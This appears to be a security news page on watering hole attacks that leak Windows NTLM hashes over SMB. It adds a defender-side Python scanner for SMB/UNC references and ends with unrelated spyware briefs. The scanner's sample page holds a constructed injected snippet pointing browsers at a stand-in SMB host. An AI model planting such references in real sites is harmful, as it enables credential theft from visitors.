Lumen Technologies' Black Lotus Labs identified a cyberthreat type called "watering hole attacks" that installs a malicious JavaScript function into a target website's code, FierceTelecom reports. The recently discovered threat has been used for several years, including in an April 2020 incident involving the San Francisco International Airport. The threat, which was identified on one website in Canada and on several websites in Ukraine, infected anyone who visited the sites, leaving them vulnerable to theft of their Windows authentication credentials, which could be used to impersonate the victims. According to researchers, the attack enables threat actors to obtain New Technology LAN Manager (NTLM) hashes from the victims' devices, which they then use to recover usernames and passwords. "To protect against this type of attack, organizations should configure their firewalls to prevent outbound SMB-based communications from leaving the network or consider turning off or limiting SMB in the corporate environment," said Black Lotus Labs' Mike Benjamin.
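As an added example (not code from Black Lotus Labs, Lumen or the report above), the following Python script shows one check a site owner can run against their own pages: it parses the HTML and flags inline scripts or resource attributes that point at a remote SMB/UNC location, the kind of injected reference that causes a Windows browser to attempt the outbound SMB connection Benjamin recommends blocking. The sample page, the host 203.0.113.5 and the set of attributes inspected are constructed for this example.

```python
"""Flag HTML content that references a remote SMB/UNC location.

Hypothetical defender-side check written for this example; it is not
tooling from Black Lotus Labs or Lumen. Run it over pages you own to
spot injected references that would push visitors' browsers toward
an outbound SMB connection.
"""
import re
from html.parser import HTMLParser

# Matches file://host, file:\\host, smb://host, or a bare UNC path \\host.
# The lookbehind stops "\\share" or "\\file.png" inside an already-matched
# UNC path from being reported as a second host.
SMB_REF = re.compile(
    r"(?:file:(?://|\\{2,})|smb://|(?<![:\w])\\{2,})([A-Za-z0-9][A-Za-z0-9._-]*)",
    re.IGNORECASE,
)

# Attributes whose value is fetched by the browser without user interaction.
URL_ATTRIBUTES = ("src", "href", "data", "action", "background", "poster")


class _Collector(HTMLParser):
    """Collects inline script bodies and URL-bearing attribute values."""

    def __init__(self):
        super().__init__()
        self.in_script = False
        self.script_buf = []
        self.texts = []  # (location, text) pairs to scan

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            self.script_buf = []
        for name, value in attrs:
            if value and name in URL_ATTRIBUTES:
                self.texts.append((f"<{tag} {name}>", value))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
            self.texts.append(("inline script", "".join(self.script_buf)))

    def handle_data(self, data):
        # Script bodies are delivered as CDATA chunks; buffer them so a
        # reference split across chunks is still seen whole.
        if self.in_script:
            self.script_buf.append(data)


def find_smb_references(html):
    """Return [(location, host), ...] for every SMB/UNC reference found."""
    collector = _Collector()
    collector.feed(html)
    collector.close()
    findings = []
    for where, text in collector.texts:
        for match in SMB_REF.finditer(text):
            findings.append((where, match.group(1)))
    return findings


# Constructed sample page: a legitimate CDN script plus an injected block
# that references a remote host both via file:// and via a UNC path.
SAMPLE_PAGE = r"""<html><head>
<script src="https://cdn.example.com/app.js"></script>
<script>
// constructed injected snippet of the kind described in the report
var i = new Image(); i.src = "file://203.0.113.5/assets/logo.png";
document.write('<img src="\\\\203.0.113.5\\share\\x.png">');
</script></head><body><img src="/static/hero.png"></body></html>"""

if __name__ == "__main__":
    for where, host in find_smb_references(SAMPLE_PAGE):
        print(f"SMB/UNC reference in {where}: host {host}")
```

The script reports the host each reference points at, so a finding can be checked against the outbound-SMB firewall logs the quoted advice implies: a host that appears here and in blocked outbound 445/139 connections from workstations is a strong sign the page was tampered with.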
Jill Aitoro is senior vice president of content strategy for CyberRisk Alliance. She has more than 20 years of experience editing and reporting on technology, business and policy. Prior to joining CRA, she worked at Sightline Media as editor of Defense News and executive editor of the Business-to-Government Group. She previously worked at Washington Business Journal and Nextgov, covering federal technology, contracting and policy, as well as CMP Media’s VARBusiness and CRN and Penton Media’s iSeries News.
Kaspersky tells SC Media that the cybersecurity firm is unaware of victims outside the company and is not attributing the activity to a government or other actor.
Officials, journalists, and activists across Armenia were reported by Access Now, Citizen Lab, Amnesty International, CyberHUB-AM, and independent researcher Ruben Muradyan to have been targeted in at least 12 instances with the NSO Group's Pegasus spyware, Reuters reports.
Intellexa's commercial Predator spyware, which has been used in surveillance operations targeted at European politicians, Meta executives, and journalists, has been deploying its Alien loader to the 'zygote64' Android process to enable more spyware components, according to BleepingComputer.